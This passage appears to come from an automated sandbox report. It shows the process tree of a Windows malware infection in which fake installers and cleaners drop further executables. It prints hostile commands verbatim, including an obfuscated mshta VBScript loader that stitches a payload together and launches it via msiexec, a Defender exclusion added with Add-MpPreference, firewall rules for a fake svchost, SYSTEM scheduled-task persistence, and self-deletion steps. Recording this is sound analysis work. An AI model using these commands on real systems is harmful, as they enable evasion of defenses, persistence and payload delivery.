                                                                                                              "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Settings\Settings 1.0.0\install\FD7DF1F\Settings Installation.msi" SID=778 CID=778 SILENT=1 /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\0pnphvw4.n0k\setting.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\0pnphvw4.n0k\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634529678 SID=778 CID=778 SILENT=1 /quiet " SID="778" CID="778"
                                                                                                              14⤵
                                                                                                                PID:10528
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jrez5wkh.5qt\GcleanerEU.exe /eufive & exit
                                                                                                            12⤵
                                                                                                              PID:6428
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\jrez5wkh.5qt\GcleanerEU.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\jrez5wkh.5qt\GcleanerEU.exe /eufive
                                                                                                                13⤵
                                                                                                                  PID:5228
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\djfgy3gi.kio\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                12⤵
                                                                                                                  PID:3232
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\djfgy3gi.kio\installer.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\djfgy3gi.kio\installer.exe /qn CAMPAIGN="654"
                                                                                                                    13⤵
                                                                                                                    • Loads dropped DLL
                                                                                                                    • Enumerates connected drives
                                                                                                                    • Modifies system certificate store
                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                    PID:9804
                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\r4r0olmt.3i4\any.exe & exit
                                                                                                                  12⤵
                                                                                                                    PID:9156
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      13⤵
                                                                                                                      • Loads dropped DLL
                                                                                                                      PID:8056
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\r4r0olmt.3i4\any.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\r4r0olmt.3i4\any.exe
                                                                                                                      13⤵
                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                      PID:10004
                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\us2e3td4.ang\gcleaner.exe /mixfive & exit
                                                                                                                    12⤵
                                                                                                                      PID:9464
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\us2e3td4.ang\gcleaner.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\us2e3td4.ang\gcleaner.exe /mixfive
                                                                                                                        13⤵
                                                                                                                          PID:9196
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4mdh3iwi.l0t\FastPC.exe /verysilent & exit
                                                                                                                        12⤵
                                                                                                                          PID:9560
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\4mdh3iwi.l0t\FastPC.exe
                                                                                                                            C:\Users\Admin\AppData\Local\Temp\4mdh3iwi.l0t\FastPC.exe /verysilent
                                                                                                                            13⤵
                                                                                                                            • Checks processor information in registry
                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                            PID:9628
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im FastPC.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\4mdh3iwi.l0t\FastPC.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                              14⤵
                                                                                                                                PID:11240
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /im FastPC.exe /f
                                                                                                                                  15⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:11568
                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3tfmmbuj.iv1\FastPC.exe /verysilent & exit
                                                                                                                            12⤵
                                                                                                                              PID:9768
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3tfmmbuj.iv1\FastPC.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\3tfmmbuj.iv1\FastPC.exe /verysilent
                                                                                                                                13⤵
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:4904
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-OH8MR.tmp\FastPC.tmp
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-OH8MR.tmp\FastPC.tmp" /SL5="$10884,138429,56832,C:\Users\Admin\AppData\Local\Temp\3tfmmbuj.iv1\FastPC.exe" /verysilent
                                                                                                                                  14⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:2088
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-LQ3UF.tmp\Setup.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-LQ3UF.tmp\Setup.exe" /Verysilent
                                                                                                                                    15⤵
                                                                                                                                      PID:9740
                                                                                                                                      • C:\Program Files (x86)\FastPc\FastPc\Faster.exe
                                                                                                                                        "C:\Program Files (x86)\FastPc\FastPc\Faster.exe"
                                                                                                                                        16⤵
                                                                                                                                          PID:1332
                                                                                                                                        • C:\Program Files (x86)\FastPc\FastPc\Fast_.exe
                                                                                                                                          "C:\Program Files (x86)\FastPc\FastPc\Fast_.exe"
                                                                                                                                          16⤵
                                                                                                                                            PID:9896
                                                                                                                                          • C:\Program Files (x86)\FastPc\FastPc\Fast.exe
                                                                                                                                            "C:\Program Files (x86)\FastPc\FastPc\Fast.exe"
                                                                                                                                            16⤵
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            PID:9528
                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\v1hwritc.aed\autosubplayer.exe /S & exit
                                                                                                                                    12⤵
                                                                                                                                      PID:10040
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\v1hwritc.aed\autosubplayer.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\v1hwritc.aed\autosubplayer.exe /S
                                                                                                                                        13⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:8244
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsh4B37.tmp\tempfile.ps1"
                                                                                                                                          14⤵
                                                                                                                                            PID:6428
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              15⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4152
                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\AnwSk_6YPiX3NMdVkDp7Y3AB.exe
                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\AnwSk_6YPiX3NMdVkDp7Y3AB.exe"
                                                                                                                                8⤵
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:8996
                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\lH11SfLqEA4Iw9bgiDqExeiZ.exe
                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\lH11SfLqEA4Iw9bgiDqExeiZ.exe"
                                                                                                                                8⤵
                                                                                                                                • Loads dropped DLL
                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                PID:4704
                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                  9⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  • Adds Run key to start application
                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                  PID:5908
                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
                                                                                                                                    10⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    PID:10100
                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                      C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x214,0x218,0x21c,0x210,0x220,0x7fff97a8dec0,0x7fff97a8ded0,0x7fff97a8dee0
                                                                                                                                      11⤵
                                                                                                                                        PID:5100
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                          C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x134,0x138,0x13c,0x110,0x140,0x7ff654379e70,0x7ff654379e80,0x7ff654379e90
                                                                                                                                          12⤵
                                                                                                                                            PID:10112
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,10146575834712880331,11870196705687784870,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10100_97892614" --mojo-platform-channel-handle=1756 /prefetch:8
                                                                                                                                          11⤵
                                                                                                                                            PID:11068
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1648,10146575834712880331,11870196705687784870,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw10100_97892614" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1708 /prefetch:2
                                                                                                                                            11⤵
                                                                                                                                              PID:11048
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                      7⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:7976
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                      7⤵
                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                      PID:2824
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\SfaHfUSSAeqgP9m4egp7CnQ0.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\SfaHfUSSAeqgP9m4egp7CnQ0.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                    PID:6276
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\ioAZydD7BulFkVWD2TUKcoBH.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\ioAZydD7BulFkVWD2TUKcoBH.exe"
                                                                                                                                    6⤵
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    • Drops file in Windows directory
                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                    PID:6224
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\
                                                                                                                                      7⤵
                                                                                                                                        PID:7668
                                                                                                                                      • C:\Windows\System32\netsh.exe
                                                                                                                                        "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                        7⤵
                                                                                                                                          PID:4244
                                                                                                                                        • C:\Windows\System32\netsh.exe
                                                                                                                                          "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes
                                                                                                                                          7⤵
                                                                                                                                            PID:8084
                                                                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                                                            schtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM
                                                                                                                                            7⤵
                                                                                                                                            • Creates scheduled task(s)
                                                                                                                                            PID:4420
                                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                              8⤵
                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                              PID:6180
                                                                                                                                          • C:\Windows\System\svchost.exe
                                                                                                                                            "C:\Windows\System\svchost.exe" formal
                                                                                                                                            7⤵
                                                                                                                                              PID:2108
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\0GvLb4TJYATOzPU_kxq_j8dg.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\0GvLb4TJYATOzPU_kxq_j8dg.exe"
                                                                                                                                            6⤵
                                                                                                                                              PID:6164
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c Fri0541e16ce794d258f.exe
                                                                                                                                          4⤵
                                                                                                                                            PID:3512
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri0541e16ce794d258f.exe
                                                                                                                                              Fri0541e16ce794d258f.exe
                                                                                                                                              5⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                              PID:4256
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c Fri05890d11cdb13f95e.exe
                                                                                                                                            4⤵
                                                                                                                                              PID:2996
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c Fri051e1e7444.exe
                                                                                                                                              4⤵
                                                                                                                                                PID:3740
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c Fri05851d7f13.exe
                                                                                                                                                4⤵
                                                                                                                                                  PID:2832
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c Fri053f5694ea31c9a.exe
                                                                                                                                                  4⤵
                                                                                                                                                    PID:2984
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c Fri05f84fa77402bf.exe
                                                                                                                                                    4⤵
                                                                                                                                                      PID:356
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri053f5694ea31c9a.exe
                                                                                                                                                Fri053f5694ea31c9a.exe
                                                                                                                                                1⤵
                                                                                                                                                  PID:4108
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri053f5694ea31c9a.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri053f5694ea31c9a.exe
                                                                                                                                                    2⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    PID:4856
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-S4FU0.tmp\Fri05eeb2dae7b88520a.tmp
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-S4FU0.tmp\Fri05eeb2dae7b88520a.tmp" /SL5="$10282,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05eeb2dae7b88520a.exe"
                                                                                                                                                  1⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:4176
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05eeb2dae7b88520a.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05eeb2dae7b88520a.exe" /SILENT
                                                                                                                                                    2⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                                                    PID:4824
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-ASN2E.tmp\Fri05eeb2dae7b88520a.tmp
                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-ASN2E.tmp\Fri05eeb2dae7b88520a.tmp" /SL5="$202AC,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05eeb2dae7b88520a.exe" /SILENT
                                                                                                                                                      3⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:4948
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-VBO7L.tmp\postback.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-VBO7L.tmp\postback.exe" ss1
                                                                                                                                                        4⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:4568
                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbScRIPT: cLOse ( CreateoBJeCT( "WSCRipT.shell" ). Run( "CMd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05cc28ce70b.exe"" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if """" == """" for %j IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05cc28ce70b.exe"" ) do taskkill -f /im ""%~Nxj"" " , 0 , truE ) )
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4200
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05cc28ce70b.exe" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if "" == "" for %j IN ( "C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05cc28ce70b.exe" ) do taskkill -f /im "%~Nxj"
                                                                                                                                                      2⤵
                                                                                                                                                        PID:4636
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\EiV4.Exe
                                                                                                                                                          EIv4.Exe /pllbp0ygmDYA
                                                                                                                                                          3⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:4208
                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                            "C:\Windows\System32\mshta.exe" vbScRIPT: cLOse ( CreateoBJeCT( "WSCRipT.shell" ). Run( "CMd.exe /q /R coPY /Y ""C:\Users\Admin\AppData\Local\Temp\EiV4.Exe"" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if ""/pllbp0ygmDYA "" == """" for %j IN ( ""C:\Users\Admin\AppData\Local\Temp\EiV4.Exe"" ) do taskkill -f /im ""%~Nxj"" " , 0 , truE ) )
                                                                                                                                                            4⤵
                                                                                                                                                              PID:2020
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /q /R coPY /Y "C:\Users\Admin\AppData\Local\Temp\EiV4.Exe" EiV4.Exe &&START EIv4.Exe /pllbp0ygmDYA & if "/pllbp0ygmDYA " == "" for %j IN ( "C:\Users\Admin\AppData\Local\Temp\EiV4.Exe" ) do taskkill -f /im "%~Nxj"
                                                                                                                                                                5⤵
                                                                                                                                                                  PID:2896
                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                "C:\Windows\System32\mshta.exe" VBscript: clOSe ( creAteOBJECT( "WSCrIPt.sHElL" ). rUn ( "cMD /Q /c EcHo fDuz%RanDOm%hWPV>BPZetK~.NZD & eCho | sEt /P = ""MZ"" > YAnI.V & COPy /Y /b YANI.V + L0YE_.MQ + V3DggE~.P + FAPqTQ.HJ + 51QbM.RF + BPZetK~.NZD W72F~U.S8_ & staRt msiexec /y .\W72F~U.S8_ " , 0 , tRuE ) )
                                                                                                                                                                4⤵
                                                                                                                                                                  PID:5880
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /Q /c EcHo fDuz%RanDOm%hWPV>BPZetK~.NZD & eCho | sEt /P = "MZ" > YAnI.V & COPy /Y /b YANI.V +L0YE_.MQ + V3DggE~.P + FAPqTQ.HJ +51QbM.RF + BPZetK~.NZD W72F~U.S8_ & staRt msiexec /y .\W72F~U.S8_
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:4252
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" eCho "
                                                                                                                                                                        6⤵
                                                                                                                                                                          PID:836
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>YAnI.V"
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:5568
                                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                            msiexec /y .\W72F~U.S8_
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            PID:7328
                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                      taskkill -f /im "Fri05cc28ce70b.exe"
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                      PID:1380
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS47CDF727\Fri05890d11cdb13f95e.exe
                                                                                                                                                                  Fri05890d11cdb13f95e.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:4620
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:4916
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\BCleanSoft82.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:4296
                                                                                                                                                                        • C:\ProgramData\3653827.exe
                                                                                                                                                                          "C:\ProgramData\3653827.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:4852
                                                                                                                                                                        • C:\ProgramData\6993924.exe
                                                                                                                                                                          "C:\ProgramData\6993924.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                          PID:5260
                                                                                                                                                                        • C:\ProgramData\8177787.exe
                                                                                                                                                                          "C:\ProgramData\8177787.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                          PID:4200
                                                                                                                                                                        • C:\ProgramData\8304600.exe
                                                                                                                                                                          "C:\ProgramData\8304600.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                          PID:5732
                                                                                                                                                                        • C:\ProgramData\628507.exe
                                                                                                                                                                          "C:\ProgramData\628507.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                          PID:6728
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:5128
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Soft1WW02.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:5232
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5232 -s 1552
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:4672
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\4.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\4.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:5368
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                                                          PID:5824
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                                        PID:5628
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 800
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:6920
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 840
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:5348
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 912
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:6860
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 884
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:7416
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5628 -s 824
                                                                                                                                                                          4⤵
                                                                                                                                                                          • Program crash
                                                                                                                                                                          PID:7884
